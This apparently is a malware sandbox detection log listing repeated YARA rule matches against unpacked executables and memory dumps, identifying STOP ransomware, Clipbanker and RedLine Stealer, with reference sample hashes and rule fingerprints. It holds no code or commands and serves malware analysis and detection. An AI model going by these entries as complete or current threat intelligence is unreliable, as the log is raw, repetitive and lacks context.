Source: 30.2.mstsca.exe.8615a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 30.2.mstsca.exe.8615a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 32.2.mstsca.exe.9615a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 32.2.mstsca.exe.9615a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 0.2.R5391762lf.exe.5ea15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 0.2.R5391762lf.exe.5ea15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 6.2.R5391762lf.exe.5ec15a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 6.2.R5391762lf.exe.5ec15a0.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 8.2.R5391762lf.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 8.2.R5391762lf.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 23.2.R5391762lf.exe.5e115a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 23.2.R5391762lf.exe.5e115a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 23.2.R5391762lf.exe.5e115a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 23.2.R5391762lf.exe.5e115a0.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 12.2.R5391762lf.exe.5da15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 12.2.R5391762lf.exe.5da15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 2.2.R5391762lf.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 2.2.R5391762lf.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 14.2.R5391762lf.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 14.2.R5391762lf.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 6.2.R5391762lf.exe.5ec15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 6.2.R5391762lf.exe.5ec15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 5.2.R5391762lf.exe.5db15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 5.2.R5391762lf.exe.5db15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 12.2.R5391762lf.exe.5da15a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 12.2.R5391762lf.exe.5da15a0.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 24.2.R5391762lf.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 24.2.R5391762lf.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 14.2.R5391762lf.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 14.2.R5391762lf.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 24.2.R5391762lf.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 24.2.R5391762lf.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 0.2.R5391762lf.exe.5ea15a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 0.2.R5391762lf.exe.5ea15a0.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 8.2.R5391762lf.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 8.2.R5391762lf.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 2.2.R5391762lf.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 2.2.R5391762lf.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 0000001E.00000002.2677102464.0000000000860000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 0000001E.00000002.2677102464.0000000000860000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 0000000E.00000002.1561850226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 0000000E.00000002.1561850226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000006.00000002.1411124880.0000000005EC0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000008.00000002.3833609200.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000008.00000002.3833609200.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000014.00000002.3833462867.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 00000014.00000002.3833462867.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 00000005.00000002.1405143882.0000000004456000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 0000000D.00000002.1620821652.000000000088C000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 0000000C.00000002.1548831250.0000000005DA0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000005.00000002.1405257408.0000000005DB0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000018.00000002.1801978048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000018.00000002.1801978048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000000.00000002.1373934785.0000000004498000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000002.00000002.1397075363.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000002.00000002.1397075363.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000009.00000002.1502845330.0000000001D0E000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 0000000C.00000002.1548118097.0000000004466000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000002.1374077836.0000000005EA0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000006.00000002.1411013560.0000000004578000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 0000001B.00000002.2060772952.0000000000B00000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000017.00000002.1792622413.0000000005E10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000017.00000002.1792336779.00000000044D3000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 0000001C.00000002.2059366101.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
